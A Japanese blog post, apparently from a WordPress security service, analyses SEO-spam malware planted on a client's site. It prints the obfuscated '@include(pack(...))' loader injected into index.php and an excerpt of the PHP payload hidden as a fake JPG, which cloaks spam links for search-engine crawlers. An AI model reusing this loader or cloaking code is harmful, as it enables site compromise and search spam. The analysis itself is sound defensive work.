お客様の依頼事例で新しいタイプのJPGファイルに偽装するマルウェアが発見されましたのでこちらに公開いたします。
index.phpにハッカーが不正な読み込みコードを挿入
ワードプレスの表示が突然真っ白になって、何も表示されなくなったり、レイアウトずれが生じたりサイト上に、意味不明なリンクやURLが表示されていたらご注意ください。
今回、弊社のお客様のご依頼で発見したタイプのマルウェアは、ワードプレスのトップディレクトリにあるindex.phpから下記のようなプログラムで読み込まれているものでした
@include(pack(難読化されたコード));
includeは外部から、ファイルを読み込む処理で、packはデータをバイナリ化する命令ですが、難読化された不正なコードを埋め込むこともできる命令です。
上記のコードを弊社でデコード(難読化解除)したところ、
/wp-includes/images/wp-skin.jpg
のようにJPGファイルを読み込んでいることが判明しました。
JPGに偽装するタイプのマルウェア
このwp-skin.jpgを開くと下記のようなコードがファイルに読み込まれていました。
※一部抜粋 xxxxの部分は違法サイトの可能性があるため伏字にしています。
$fromsite = "http://www.xxxxxx.co.jp/shop/default.aspx";
$tmp = strtolower($_SERVER['HTTP_USER_AGENT']);
$filename = "";
$mysite = 'http://'.$_SERVER['HTTP_HOST'].'/';
if (strpos($tmp, 'google') !== false || strpos($tmp, 'yahoo') !== false || strpos($tmp, 'aol') !== false || strpos($tmp, 'sqworm') !== false || strpos($tmp, 'bot') !== false || strpos($tmp, 'msn') !== false || strpos($tmp, 'goo') !== false) {
$ksite = !empty($_GET['success']) ? $_GET['success'] : "";
$list = array(
'プレゼント' => 'http://www.xxxxxx.com/',
'女性 ウオッチ' => 'http://www.xxxxx.com/',
このコードはGoogleやYahooがサイトをクロールするときに、あたかも「プレゼント」や「女性 ウオッチ」でそのサイトからリンクされているように見せかけるタイプのSEOハックと呼ばれる種類のものです。
(検索エンジンは被リンク数でサイトの質を評価するため被リンクをハッキングによって張っています)
日本語のリンクで、このファイルに記載されている不正リンクも日本語のサイトであることから、日本人が作って広めているマルウェアの可能性もございます。
また、このSEOハックは最悪サイトの表示を阻害し、表示不全を引き起こすこともありますので、このような症状にお心当たりがある場合はWPドクターにご相談ください。
※このウィルスのパターン定義は弊社のワードプレスマルウェア・ウィルススキャナに導入済みです
